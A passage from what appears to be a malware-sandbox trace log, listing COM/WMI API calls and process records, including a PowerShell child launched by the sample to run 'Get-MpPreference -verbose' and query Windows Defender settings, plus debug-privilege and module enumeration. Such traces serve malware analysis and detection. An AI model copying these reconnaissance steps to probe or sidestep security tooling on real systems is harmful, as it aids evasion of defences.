ppvObject=0x8f1f234*=0x7eb07c) returned 0x0 [0042.087] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7eb07c, pProxy=0x880d334, pAuthnSvc=0x8f1f284, pAuthzSvc=0x8f1f280, pServerPrincName=0x8f1f278, pAuthnLevel=0x8f1f27c, pImpLevel=0x8f1f26c, pAuthInfo=0x8f1f270, pCapabilites=0x8f1f274 | out: pAuthnSvc=0x8f1f284*=0xa, pAuthzSvc=0x8f1f280*=0x0, pServerPrincName=0x8f1f278, pAuthnLevel=0x8f1f27c*=0x6, pImpLevel=0x8f1f26c*=0x2, pAuthInfo=0x8f1f270, pCapabilites=0x8f1f274*=0x1) returned 0x0 [0042.087] WbemLocator:IUnknown:Release (This=0x7eb07c) returned 0x1 [0042.087] WbemLocator:IUnknown:QueryInterface (in: This=0x880d334, riid=0x741f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f1f228 | out: ppvObject=0x8f1f228*=0x7eb09c) returned 0x0 [0042.087] WbemLocator:IUnknown:QueryInterface (in: This=0x880d334, riid=0x741f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f1f224 | out: ppvObject=0x8f1f224*=0x7eb07c) returned 0x0 [0042.087] WbemLocator:IClientSecurity:SetBlanket (This=0x7eb07c, pProxy=0x880d334, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0042.087] WbemLocator:IUnknown:Release (This=0x7eb07c) returned 0x2 [0042.087] WbemLocator:IUnknown:Release (This=0x7eb09c) returned 0x1 [0042.087] CoTaskMemFree (pv=0x7eb120) [0042.087] WbemLocator:IUnknown:Release (This=0x8800b40) returned 0x0 [0042.087] WbemLocator:IUnknown:QueryInterface (in: This=0x880d334, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f1ee24 | out: ppvObject=0x8f1ee24*=0x7eb09c) returned 0x0 [0042.088] WbemLocator:IUnknown:QueryInterface (in: This=0x7eb09c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f1ede0 | out: ppvObject=0x8f1ede0*=0x0) returned 0x80004002 [0042.088] WbemLocator:IUnknown:QueryInterface (in: This=0x7eb09c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f1ebfc | out: ppvObject=0x8f1ebfc*=0x0) returned 0x80004002 [0042.088] WbemLocator:IUnknown:AddRef (This=0x7eb09c) returned 0x3 [0042.089] WbemLocator:IUnknown:QueryInterface (in: This=0x7eb09c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f1e73c | out: ppvObject=0x8f1e73c*=0x0) returned 0x80004002 [0042.089] WbemLocator:IUnknown:QueryInterface (in: This=0x7eb09c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f1e6ec | out: ppvObject=0x8f1e6ec*=0x0) returned 0x80004002 [0042.089] WbemLocator:IUnknown:QueryInterface (in: This=0x7eb09c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f1e6f8 | out: ppvObject=0x8f1e6f8*=0x7eaffc) returned 0x0 [0042.089] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7eaffc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f1e700 | out: pCid=0x8f1e700*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0042.089] WbemLocator:IUnknown:Release (This=0x7eaffc) returned 0x3 [0042.089] CoGetContextToken (in: pToken=0x8f1e758 | out: pToken=0x8f1e758) returned 0x0 [0042.089] CoGetContextToken (in: pToken=0x8f1eb60 | out: pToken=0x8f1eb60) returned 0x0 [0042.089] WbemLocator:IUnknown:QueryInterface (in: This=0x7eb09c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f1ebf0 | out: ppvObject=0x8f1ebf0*=0x7eb084) returned 0x0 [0042.090] WbemLocator:IRpcOptions:Query (in: This=0x7eb084, pPrx=0x7eb09c, dwProperty=2, pdwValue=0x8f1ec18 | out: pdwValue=0x8f1ec18) returned 0x80004002 [0042.090] WbemLocator:IUnknown:Release (This=0x7eb084) returned 0x3 [0042.090] WbemLocator:IUnknown:Release (This=0x7eb09c) returned 0x2 [0042.090] CoGetContextToken (in: pToken=0x8f1f138 | out: pToken=0x8f1f138) returned 0x0 [0042.090] CoGetContextToken (in: pToken=0x8f1f098 | out: pToken=0x8f1f098) returned 0x0 [0042.090] WbemLocator:IUnknown:QueryInterface (in: This=0x7eb09c, riid=0x8f1f168*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f1f164 | out: ppvObject=0x8f1f164*=0x880d334) returned 0x0 [0042.090] WbemLocator:IUnknown:AddRef (This=0x880d334) returned 0x4 [0042.090] WbemLocator:IUnknown:Release (This=0x880d334) returned 0x3 [0042.091] WbemLocator:IUnknown:Release (This=0x880d334) returned 0x2 [0042.098] SysStringLen (param_1=0x0) returned 0x0 [0042.099] CoUninitialize () Thread: id = 13 os_tid = 0x174 Thread: id = 54 os_tid = 0x7cc [0042.118] CoGetContextToken (in: pToken=0x8fff130 | out: pToken=0x8fff130) returned 0x0 [0042.119] CoGetContextToken (in: pToken=0x8fff120 | out: pToken=0x8fff120) returned 0x0 [0042.119] CoGetMarshalSizeMax (in: pulSize=0x8fff0dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x7eb09c, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x8fff0dc) returned 0x0 [0042.119] CoMarshalInterface (pStm=0x7c39d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x7eb09c, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 Thread: id = 95 os_tid = 0x854 Thread: id = 104 os_tid = 0x8e4 Thread: id = 105 os_tid = 0x5a8 [0073.509] SleepEx (dwMilliseconds=0x14, bAlertable=0) Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 14 os_tid = 0x790 Thread: id = 15 os_tid = 0x798 Thread: id = 16 os_tid = 0x320 Thread: id = 17 os_tid = 0x6cc Thread: id = 18 os_tid = 0x42c Thread: id = 19 os_tid = 0x1e4 Thread: id = 20 os_tid = 0x760 Thread: id = 21 os_tid = 0x75c Thread: id = 22 os_tid = 0x74c Thread: id = 23 os_tid = 0x710 Thread: id = 24 os_tid = 0x6e8 Thread: id = 25 os_tid = 0x6e0 Thread: id = 26 os_tid = 0x6d0 Thread: id = 27 os_tid = 0x6bc Thread: id = 28 os_tid = 0x6b8 Thread: id = 29 os_tid = 0x6b0 Thread: id = 30 os_tid = 0x6a8 Thread: id = 31 os_tid = 0x69c Thread: id = 32 os_tid = 0x698 Thread: id = 33 os_tid = 0x688 Thread: id = 34 os_tid = 0x684 Thread: id = 35 os_tid = 0x678 Thread: id = 36 os_tid = 0x4a8 Thread: id = 37 os_tid = 0x46c Thread: id = 38 os_tid = 0x44c Thread: id = 39 os_tid = 0x424 Thread: id = 40 os_tid = 0x420 Thread: id = 41 os_tid = 0x41c Thread: id = 42 os_tid = 0x404 Thread: id = 43 os_tid = 0x14c Thread: id = 44 os_tid = 0x158 Thread: id = 45 os_tid = 0x3fc Thread: id = 46 os_tid = 0x3f4 Thread: id = 47 os_tid = 0x3e8 Thread: id = 48 os_tid = 0x39c Thread: id = 49 os_tid = 0x390 Thread: id = 50 os_tid = 0x38c Thread: id = 51 os_tid = 0x388 Thread: id = 52 os_tid = 0x37c Thread: id = 53 os_tid = 0x374 Thread: id = 72 os_tid = 0x7e8 Thread: id = 73 os_tid = 0x114 Thread: id = 74 os_tid = 0x488 Thread: id = 75 os_tid = 0x36c Thread: id = 76 os_tid = 0x138 Thread: id = 85 os_tid = 0x414 Thread: id = 86 os_tid = 0x64 Thread: id = 87 os_tid = 0x318 Thread: id = 88 os_tid = 0x6a4 Thread: id = 89 os_tid = 0x304 Thread: id = 90 os_tid = 0x804 Thread: id = 93 os_tid = 0x834 Thread: id = 94 os_tid = 0x844 Thread: id = 106 os_tid = 0x3a4 Thread: id = 107 os_tid = 0x8d8 Thread: id = 108 os_tid = 0xb84 Thread: id = 109 os_tid = 0xb8c Thread: id = 110 os_tid = 0xb98 Thread: id = 111 os_tid = 0x908 Thread: id = 112 os_tid = 0x918 Thread: id = 113 os_tid = 0xb9c Thread: id = 114 os_tid = 0x838 Thread: id = 115 os_tid = 0x6fc Thread: id = 137 os_tid = 0x5bc Thread: id = 138 os_tid = 0x968 Thread: id = 139 os_tid = 0x2c4 Thread: id = 140 os_tid = 0x928 Thread: id = 141 os_tid = 0x938 Thread: id = 143 os_tid = 0x6f4 Thread: id = 144 os_tid = 0x53c Thread: id = 145 os_tid = 0x604 Thread: id = 146 os_tid = 0x5a8 Thread: id = 147 os_tid = 0x854 Thread: id = 151 os_tid = 0x918 Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5ae6c000" os_pid = "0xa40" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00044e7a" [0xc000000f] Thread: id = 55 os_tid = 0xa68 Thread: id = 56 os_tid = 0xa60 Thread: id = 57 os_tid = 0xa5c Thread: id = 58 os_tid = 0xa58 Thread: id = 59 os_tid = 0xa54 Thread: id = 60 os_tid = 0xa50 Thread: id = 61 os_tid = 0xa4c Thread: id = 62 os_tid = 0xa48 Thread: id = 63 os_tid = 0xa44 Thread: id = 91 os_tid = 0x814 Thread: id = 142 os_tid = 0x948 Thread: id = 150 os_tid = 0xbc0 Thread: id = 152 os_tid = 0x960 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5cc67000" os_pid = "0xa10" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 64 os_tid = 0xa30 Thread: id = 65 os_tid = 0xa2c Thread: id = 66 os_tid = 0xa28 Thread: id = 67 os_tid = 0xa24 Thread: id = 68 os_tid = 0xa20 Thread: id = 69 os_tid = 0xa1c Thread: id = 70 os_tid = 0xa18 Thread: id = 71 os_tid = 0xa14 Thread: id = 92 os_tid = 0x824 Thread: id = 149 os_tid = 0xba4 Thread: id = 153 os_tid = 0x950 Process: id = "5" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x4226e000" os_pid = "0x3b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x8e8" cmd_line = "\"powershell\" Get-MpPreference -verbose" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 77 os_tid = 0x600 [0045.585] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0045.848] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0045.848] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0045.848] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0045.848] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0046.680] GetVersionExW (in: lpVersionInformation=0x247318*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x247318*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.680] GetLastError () returned 0x2 [0046.681] GetVersionExW (in: lpVersionInformation=0x247318*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x247318*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.681] GetLastError () returned 0x2 [0046.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.687] GetLastError () returned 0x2 [0046.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e538, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.703] GetLastError () returned 0x2 [0046.704] GetVersionExW (in: lpVersionInformation=0x247318*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x247318*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.704] GetLastError () returned 0x2 [0046.704] SetErrorMode (uMode=0x1) returned 0x1 [0046.706] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x19e9b8 | out: lpFileInformation=0x19e9b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0046.706] GetLastError () returned 0x2 [0046.706] SetErrorMode (uMode=0x1) returned 0x1 [0046.709] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x19ea3c | out: lpdwHandle=0x19ea3c) returned 0x94c [0046.711] GetLastError () returned 0x0 [0046.712] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a94d48 | out: lpData=0x2a94d48) returned 1 [0046.715] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x19ea08, puLen=0x19ea04 | out: lplpBuffer=0x19ea08*=0x2a94de4, puLen=0x19ea04) returned 1 [0046.717] lstrlenW (lpString="䅁") returned 1 [0046.727] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x2a94ec0, puLen=0x19e980) returned 1 [0046.727] lstrlenW (lpString="Microsoft Corporation") returned 21 [0046.728] lstrcpyW (in: lpString1=0x247300, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0046.728] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x2a94f14, puLen=0x19e980) returned 1 [0046.728] lstrlenW (lpString="System.Management.Automation") returned 28 [0046.728] lstrcpyW (in: lpString1=0x247300, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0046.728] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x2a94f70, puLen=0x19e980) returned 1 [0046.728] lstrlenW (lpString="6.1.7601.17514") returned 14 [0046.728] lstrcpyW (in: lpString1=0x247300, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0046.729] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x2a94fb0, puLen=0x19e980) returned 1 [0046.729] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0046.729] lstrcpyW (in: lpString1=0x247300, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0046.729] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x2a95018, puLen=0x19e980) returned 1 [0046.729] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0046.729] lstrcpyW (in: lpString1=0x247300, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0046.729] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x2a950b4, puLen=0x19e980) returned 1 [0046.729] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0046.729] lstrcpyW (in: lpString1=0x247300, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0046.729] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x2a95118, puLen=0x19e980) returned 1 [0046.729] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0046.729] lstrcpyW (in: lpString1=0x247300, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0046.729] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x2a95194, puLen=0x19e980) returned 1 [0046.729] lstrlenW (lpString="6.1.7601.17514") returned 14 [0046.729] lstrcpyW (in: lpString1=0x247300, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0046.729] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x2a94e3c, puLen=0x19e980) returned 1 [0046.729] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0046.729] lstrcpyW (in: lpString1=0x247300, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0046.729] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x0, puLen=0x19e980) returned 0 [0046.730] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x0, puLen=0x19e980) returned 0 [0046.730] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x19e984, puLen=0x19e980 | out: lplpBuffer=0x19e984*=0x0, puLen=0x19e980) returned 0 [0046.730] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x19e978, puLen=0x19e974 | out: lplpBuffer=0x19e978*=0x2a94de4, puLen=0x19e974) returned 1 [0046.731] VerLanguageNameW (in: wLang=0x0, szLang=0x247300, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0046.733] VerQueryValueW (in: pBlock=0x2a94d48, lpSubBlock="\\", lplpBuffer=0x19e98c, puLen=0x19e988 | out: lplpBuffer=0x19e98c*=0x2a94d70, puLen=0x19e988) returned 1 [0046.742] GetCurrentProcessId () returned 0x3b4 [0046.782] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19e1c4 | out: lpLuid=0x19e1c4*(LowPart=0x14, HighPart=0)) returned 1 [0046.785] GetLastError () returned 0x0 [0046.786] GetCurrentProcess () returned 0xffffffff [0046.786] GetLastError () returned 0x0 [0046.788] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19e1c0 | out: TokenHandle=0x19e1c0*=0x310) returned 1 [0046.788] GetLastError () returned 0x0 [0046.791] AdjustTokenPrivileges (in: TokenHandle=0x310, DisableAllPrivileges=0, NewState=0x2a97888*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0046.791] GetLastError () returned 0x0 [0046.792] CloseHandle (hObject=0x310) returned 1 [0046.792] GetLastError () returned 0x0 [0046.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3b4) returned 0x310 [0046.798] GetLastError () returned 0x0 [0046.808] EnumProcessModules (in: hProcess=0x310, lphModule=0x2a978cc, cb=0x100, lpcbNeeded=0x19e9b4 | out: lphModule=0x2a978cc, lpcbNeeded=0x19e9b4) returned 1 [0046.808] GetLastError () returned 0x0 [0046.812] 